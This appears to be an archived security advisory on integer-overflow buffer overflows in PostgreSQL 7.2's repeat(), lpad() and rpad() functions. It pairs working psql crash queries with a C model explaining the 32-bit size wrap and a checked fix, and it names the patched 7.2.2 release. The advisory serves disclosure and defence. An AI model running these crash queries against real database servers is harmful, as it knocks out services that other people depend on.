COMMAND
    PostgreSQL remote and local buffer overflows

SYSTEMS AFFECTED
    all versions

PROBLEM
    In Sir Mordred The Traitor, Mordred Labs advisory [0x0003] and [0x0004]:

    Bug 1
    =====
    Upon invoking the repeat() function, the function
    src/backend/utils/adt/oracle_compat.c::repeat() gets called, and it
    suffers from a buffer overflow.

    --[ How to reproduce:

    psql> select repeat('xxx',1431655765);
    pqReadData() -- backend closed the channel unexpectedly.
            This probably means the backend terminated abnormally
            before or while processing the request.
    The connection to the server was lost. Attempting reset: Failed.

    Bug 2
    =====
    There are two buffer overflows in src/backend/utils/adt/oracle_compat.c:

    1) lpad(text, integer, text) function
    2) rpad(text, integer, text) function

    --[ Details:

    The code for these functions is src/backend/utils/adt/oracle_compat.c::lpad()
    and src/backend/utils/adt/oracle_compat.c::rpad() respectively. The code
    suffers from a buffer overflow (of course).

    --[ How to reproduce:

    shell> pgsql template1 postgres
    template1=# select version();
                               version
    -----------------------------------------------------------
     PostgreSQL 7.2 on i686-pc-linux-gnu, compiled by GCC 2.96
    (1 row)

    template1=# create database my_db with encoding='UNICODE';
    CREATE DATABASE
    template1# \c my_db
    You are now connected to database my_db.
    my_db=# select lpad('xxxxx',1431655765,'yyyyyyyyyyyyyyyy');
    pqReadData() -- backend closed the channel unexpectedly.
            This probably means the backend terminated abnormally
            before or while processing the request.
    The connection to the server was lost. Attempting reset: Failed.

    The same applies to the rpad() function.

    The vulnerable encodings are: EUC_JP, EUC_CN, EUC_KR, EUC_TW, UNICODE,
    MULE_INTERNAL.

SOLUTION
    Update (26 August 2002)
    ======
    ftp://ftp.postgresql.org/pub/sources/v7.2.2
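The count used in both reproductions, 1431655765 (0x55555555), is chosen so that the result-length arithmetic wraps on a 32-bit machine: three bytes times that count is 0xFFFFFFFF, so a header-plus-payload length computed in 32 bits comes out tiny while the copy loop still runs the full count. The following C model, added here as an illustration and not taken from the advisory or from PostgreSQL's source, shows the unchecked computation beside a checked one that rejects the request before allocating. The constants VARHDRSZ, MAX_RESULT_LEN and the function names are assumptions for this example.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed model of the length arithmetic behind repeat(text, int):
 * a result is VARHDRSZ header bytes plus count copies of the input.
 * These names and the layout are assumptions for this example, not
 * PostgreSQL's own code. */
#define VARHDRSZ 4
#define MAX_RESULT_LEN 0x3FFFFFFF   /* assumed cap on a result length (fits in int) */

/* The unchecked computation as a 32-bit machine performs it:
 * count * slen wraps silently, so a huge count yields a tiny size
 * while a copy loop driven by count would run far past it. */
uint32_t unchecked_result_size(uint32_t slen, uint32_t count)
{
    return VARHDRSZ + count * slen;
}

/* Overflow-aware version: rejects negative counts and any product that
 * would exceed MAX_RESULT_LEN, before the allocator is ever touched. */
bool checked_result_size(size_t slen, int count, size_t *out)
{
    if (count < 0)
        return false;
    if (slen != 0 && (size_t)count > (MAX_RESULT_LEN - VARHDRSZ) / slen)
        return false;               /* count * slen would exceed the cap */
    *out = VARHDRSZ + (size_t)count * slen;
    return true;
}

/* Repeat s count times into a freshly allocated NUL-terminated buffer.
 * Returns NULL when the size check or the allocation fails.  The copy
 * loop is bounded by the same byte count that was allocated, so the
 * two can never disagree. */
char *safe_repeat(const char *s, int count)
{
    size_t slen = strlen(s);
    size_t total;
    if (!checked_result_size(slen, count, &total))
        return NULL;
    size_t body = total - VARHDRSZ;        /* payload bytes, header excluded */
    char *buf = malloc(body + 1);
    if (buf == NULL)
        return NULL;
    char *p = buf;
    for (size_t i = 0; i < body; i += slen) {  /* slen == 0 gives body == 0 */
        memcpy(p, s, slen);
        p += slen;
    }
    buf[body] = '\0';
    return buf;
}

int main(void)
{
    printf("unchecked size for repeat('xxx', 1431655765): %u bytes\n",
           (unsigned)unchecked_result_size(3, 1431655765u));
    char *ok = safe_repeat("xxx", 4);
    printf("safe_repeat(\"xxx\", 4) -> %s\n", ok ? ok : "(null)");
    free(ok);
    printf("safe_repeat(\"xxx\", 1431655765) -> %s\n",
           safe_repeat("xxx", 1431655765) ? "allocated" : "rejected");
    return 0;
}
```

The unchecked size for the advisory's input comes out as 3 bytes, which is exactly the mismatch that lets the backend write past its allocation and crash; the checked version refuses the same input and only allocates what its bounded loop will fill.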